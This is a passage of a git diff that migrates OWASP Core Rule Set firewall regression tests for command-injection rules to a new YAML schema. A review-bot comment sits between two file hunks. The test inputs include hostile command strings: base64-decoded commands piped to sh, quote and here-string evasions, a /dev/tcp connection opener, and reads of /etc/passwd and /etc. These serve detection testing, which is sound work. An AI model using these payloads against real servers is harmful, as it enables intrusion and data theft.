performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "performance" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-25 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "performance" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + 
version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 25 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "https://example.com/?args=performance" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932239" - - test_title: 932239-26 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "https://example.com/?args=performance" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932239] + - test_id: 26 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "env --version" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-27 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "env --version" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 27 desc: "Block execution of env command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - referer: "https://example.com/?args=env --version" - method: GET - port: 80 - uri: "/get" - 
version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-28 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + referer: "https://example.com/?args=env --version" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 28 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "perf --version" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-29 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "perf --version" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932239] + - test_id: 29 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - referer: "https://example.com/?args=perf --version" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "932239" - - test_title: 932239-30 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + referer: "https://example.com/?args=perf --version" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + 
expect_ids: [932239] + - test_id: 30 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: ";`cat<<()' WAF evasion (mid command) stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=pi>()ng%20127.0.0.1" - version: "HTTP/1.1" - output: - log_contains: id "932240" - - test_title: 932240-16 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=pi>()ng%20127.0.0.1" + version: "HTTP/1.1" + output: + log: + expect_ids: [932240] + - test_id: 16 desc: FP against single quote inside string stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=All told, people were taken with the concept of Stadia, but the execution just didn't work. - version: "HTTP/1.1" - output: - no_log_contains: id "932240" - - test_title: 932240-17 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=All told, people were taken with the concept of Stadia, but the execution just didn't work. 
+ version: "HTTP/1.1" + output: + log: + no_expect_ids: [932240] + - test_id: 17 desc: "Detect quote evasion: kill '-'9" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=kill '-'9 - version: "HTTP/1.1" - output: - log_contains: id "932240" - - test_title: 932240-18 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=kill '-'9 + version: "HTTP/1.1" + output: + log: + expect_ids: [932240] + - test_id: 18 desc: "False positive against quote evasion with two quotes" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=An affordable housing advocate says the city's rewrite of the land development code would boost affordable housing, but there's room to do more. - version: "HTTP/1.1" - output: - no_log_contains: id "932240" - - test_title: 932240-19 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=An affordable housing advocate says the city's rewrite of the land development code would boost affordable housing, but there's room to do more. 
+ version: "HTTP/1.1" + output: + log: + no_expect_ids: [932240] + - test_id: 19 desc: "Detect quote evasion: py''thon" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=py''thon -c "print('attack')" - version: "HTTP/1.1" - output: - log_contains: id "932240" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=py''thon -c "print('attack')" + version: "HTTP/1.1" + output: + log: + expect_ids: [932240] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml index 093f360c7..8cbb89e80 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml 
@@ -1,224 +1,222 @@ --- meta: author: "Paul Beckett, Franziska Bühler, karelorigin, azurit" - enabled: true - name: "932250.yaml" description: | Tests to trigger or not trigger rule 932250. - commands used must be less than 4 chars - [\s<>&|)] is required after a command to reduce FPs +rule_id: 932250 tests: - - test_title: 932250-1 + - test_id: 1 desc: Negative test for excluded command `tar` stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932250-2=tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-2 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932250-2=tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932250-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - # FIXME: 932150 already had this false positive. 
Fix after rework - # - test_title: 932250-3 - # stages: - # - stage: - # input: - # dest_addr: "127.0.0.1" - # method: "POST" - # port: 80 - # headers: - # User-Agent: "OWASP CRS test agent" - # Host: "localhost" - # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' - # uri: "/post" - # version: "HTTP/1.1" - # output: - # no_log_contains: id "932250" - - test_title: 932250-4 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932250-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 4 desc: Negative test for excluded command `c99` stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'x=c99%20-wrapper%20sh,-c,curl%20google.com%20.' 
- uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'x=c99%20-wrapper%20sh,-c,curl%20google.com%20.' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 5 desc: "Positive test: Unix Command Injection - ksh test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=ksh -c "curl google."COM - uri: "/get?code=ksh%20-c%20\"curl%20google.\"COM" - version: HTTP/1.0 - output: - log_contains: id "932250" - - test_title: 932250-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=ksh -c "curl google."COM + uri: "/get?code=ksh%20-c%20\"curl%20google.\"COM" + version: HTTP/1.0 + output: + log: + expect_ids: [932250] + - test_id: 6 desc: Arithmetic expansion '$(())' WAF evasion (mid command) stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=%24((7))z%20-wrapper%20sh,-c,curl%20google.com%20." 
- version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=%24((7))z%20-wrapper%20sh,-c,curl%20google.com%20." + version: "HTTP/1.1" + output: + log: + expect_ids: [932250] + - test_id: 7 desc: "'ls' direct command injection" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20-l%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20-l%20/etc/passwd" + version: "HTTP/1.1" + output: + log: + expect_ids: [932250] + - test_id: 8 desc: "'ls' direct command injection (no flags)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20/etc/passwd" + version: "HTTP/1.1" + output: + log: + expect_ids: 
[932250] + - test_id: 9 desc: "'ls' direct command injection (no slashes)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20foo%20bar" - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-10 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20foo%20bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [932250] + - test_id: 10 desc: "'ls' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=kills%20foo%20bar" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-11 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=kills%20foo%20bar" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 11 desc: "FP for 'sh' without word boundary" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?show_comments_cookies_opt_in=true" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - 
test_title: 932250-12 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?show_comments_cookies_opt_in=true" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 12 desc: "FP for 'ls' without word boundary in cookie header value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "ocvsgo2tnqtc=ls08e58tnf8b027oo1nr5sv3cc" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-13 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "ocvsgo2tnqtc=ls08e58tnf8b027oo1nr5sv3cc" + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 13 desc: "FP for '7z' without word boundary in cookie header value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "oc_sessionPassphrase=7ZSW6ZeHbe3SpaUje9ThKrPf86%2B6reu1QPtwIXFYhfGTtDUXa99eNn2P2Ve2SqeJAyq%2FXYPi1zuif%2FLRj3da0RUXYlTzizBACJ9HgiNQax72lEFNKajSuHuOeqYvVRgT" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "oc_sessionPassphrase=7ZSW6ZeHbe3SpaUje9ThKrPf86%2B6reu1QPtwIXFYhfGTtDUXa99eNn2P2Ve2SqeJAyq%2FXYPi1zuif%2FLRj3da0RUXYlTzizBACJ9HgiNQax72lEFNKajSuHuOeqYvVRgT" + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml index 99184896c..d9e377534 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml 
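Review bot: test_id 3 in this hunk re-enables the case that the old file kept commented out under a FIXME ("932150 already had this false positive. Fix after rework"), yet the new entry carries no `desc:` and nothing in the hunk records that the false positive on `tar is a dark brown ...` has actually been fixed; if rule 932250 still matches it, this `no_expect_ids` check will now fail the regression run rather than stay parked. Suggest adding `desc: "Negative test: 'tar' as a plain English word (previously disabled as a known FP)"` so the intent survives the removal of the FIXME comment, and a `desc:` on test_id 2 as well, since it is the only other test here without one. Tests 1 and 2 both name their form parameter `932250-2=`, which looks like a copy-over; using `932250-1=` in test 1 would keep the log output unambiguous when a negative test unexpectedly fires. The remaining tests in this hunk only change shape (`- stage:` nesting dropped, `log_contains` → `log.expect_ids`) and look consistent with the new go-ftw schema.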
@@ -1,778 +1,776 @@ --- meta: author: "Paul Beckett, Franziska Bühler, karelorigin, Esad Cetiner, azurit" - enabled: true - name: "932260.yaml" - description: "Tests to trigger or not trigger rule 932260" +rule_id: 932260 tests: - - test_title: 932260-1 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932260-1=bash%20-c%20%22echo%20test%22" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-2 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-3 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932260-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-4 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'foo=ping pong tables' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-5 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" 
- port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'foo=time is of the essence' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-6 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'x=printf%20dwssap/cte/%20tac%20|%20rev%20|%20sh' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-7 + - test_id: 1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932260-1=bash%20-c%20%22echo%20test%22" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 2 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932260-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 4 + stages: 
+ - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=ping pong tables' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 5 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=time is of the essence' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 6 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'x=printf%20dwssap/cte/%20tac%20|%20rev%20|%20sh' + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [932260] + - test_id: 7 desc: "Unix Command Injection - python version bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=python cmd" - uri: "/get?cmd=python3.10%20cmd" - version: HTTP/1.0 - output: - log_contains: id "932260" - - test_title: 932260-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=python cmd" + uri: "/get?cmd=python3.10%20cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932260] + - test_id: 8 desc: "Unix Command 
Injection - printf bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=printf dW5hbWUgLWE=|base64 -d|sh" - uri: "/get?cmd=printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh" - version: HTTP/1.0 - output: - log_contains: id "932260" - - test_title: 932260-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=printf dW5hbWUgLWE=|base64 -d|sh" + uri: "/get?cmd=printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh" + version: HTTP/1.0 + output: + log: + expect_ids: [932260] + - test_id: 9 desc: "Positive test: Data exfiltration with gunzip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=gunzip -c /var/log/sensitive_log_file.gz' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-10 + - input: + 